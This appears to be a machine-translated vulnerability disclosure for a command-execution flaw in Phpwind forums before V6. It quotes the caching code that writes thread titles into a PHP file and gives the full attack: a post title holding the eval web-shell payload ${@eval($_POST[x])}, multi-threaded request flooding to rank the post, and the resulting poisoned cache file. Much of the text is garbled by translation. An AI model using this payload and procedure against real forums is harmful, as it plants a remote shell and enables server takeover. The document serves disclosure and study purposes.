Phpwind/sort.php will regularly deal with the number of posts per day, the amount of replies, the essence of the sort
The code directly uses Savearray to write the contents of the database query to the PHP file, savearray out the parameters, all using "double quotation marks to contain, so you can use the variable to execute arbitrary command
ElseIf ($action = = ' article ') {[email protected] (d_p. ") Data/bbscache/article_sort.php "); if (! $per | | $timestamp-$cachetime > $per *3600) {$_sortdb=$_sort=array (); $query = $db->query ("Select T.tid,t.subject,t.replies,t.fid from Pw_threads T left joins Pw_forums F on T.fid=f.fid WHERE T.ifche ck= ' 1 ' and t.locked< ' 2 ' and f.password= ' and f.allowvisit= ' and f.f_type<> ' hidden ' ORDER by t.replies DESC Limi T $cachenum "), while ($topic = $db->fetch_array ($query)) {if ($topic [' replies ']) {$topic [' Subject ']=substrs ($topic [ ' Subject '],25); $_sort[]= $topic;}} $_sortdb[' reply ']=$_sort;$_sort=array (); $query = $db->query ("Select T.tid,t.subject,t.hits,t.fid from Pw_threads T left joins Pw_forums F on T.fid=f.fid WHERE t.ifcheck= ' 1 ' and t.locked< ' 2 ' and f.password= ' and f.allowvisit= ' and F .f_type<> ' hidden ' ORDER by t.hits DESC LIMIT $cachenum "), while ($topic = $db->fetch_array ($query)) {if ($topic [' Hits ']) {$topic [' Subject ']=substrs ($topic [' Subject '],25); $_sort[]= $topic;}} $_sortdb[' hit ']=$_sOrt;$_sort=array (); $query = $db->query ("Select T.tid,t.subject,t.digest,t.fid from Pw_threads t left JOIN Pw_forums F On T.fid=f.fid WHERE t.digest<> ' 0 ' and t.ifcheck= ' 1 ' and t.locked< ' 2 ' and f.password= ' and f.allowvisit= ' and F .f_type<> ' hidden ' ORDER by t.lastpost DESC LIMIT $cachenum "), while ($topic = $db->fetch_array ($query)) {$topic [ ' Subject ']=substrs ($topic [' Subject '],25); $_sort[]= $topic;} $_sortdb[' Digest ']=$_sort, $ARTICLEDB =savearray (' _articledb ', $_sortdb); Writeover (d_p. ' Data/bbscache/article_ Sort.php ', "<?php\r\n". $ARTICLEDB. '? > ');}
Publish a post: the title is as follows
Code Area
${@eval($_POST[x])}XXXX
Open a multi-threaded (100 threads, just a few minutes), request access to that post, until the number of posts in the first 20
function Savearray ($name, $array) {$arraydb = "\$ $name =array (\r\n\t\t"; foreach ($array as $key + = $value) {$arraydb. = " '. $key. ' =>\narray (\r\n\t\t\t "; foreach ($value as $value 1) {$arraydb. = ' Array ('; foreach ($value 1 as $value 2) {$arraydb. = '". Addslashes ($value 2). ' ", ';} $arraydb. = "), \r\n\t\t\t";} $arraydb. = "), \r\n\t\t";} $arraydb. = "); \ r \ n"; return $arraydb;
Two days, when the statistics were generated, the shell was lying on the/data/bbscache/article_sort.php.
Three White Hats actual demo: http://**.**.**.**/data/bbscache/article_sort.php
Proof of vulnerability:
/data/bbscache/article_sort.php
<?php$_articledb=array (' Reply ' =>array (Array ("1", "${@eval ($_post[x])}xxxx:", "5732", "2",), Array ("10", " Ddddddddddddddddd "," "," 2 ",), Array (" 7 "," HI Everybody ( b) "," 8 "," 2 ",), Array (" 3 "," Hello "," 5 "," 2 ",), Array (" 5 " , "??", "3", "2",), Array ("2", "Test", "3", "2",), Array ("9", "Aaaaaaaaaaaaa", "2", "2",), Array ("6", "? А," 1 "," 2 ",), Array ( "8", "??" 萾, "1", "2",), "hit" =>array (Array ("1", "${@eval ($_post[x])}xxxx:", "11382", "2",), Array ("2", "Test", "3235", "2" ,), Array ("3", "Hello", "985", "2",), Array ("5", "??", "331", "2",), Array ("7", "HI Everybody ( b)", "123", "2",),
Phpwind < V6 version command execution vulnerability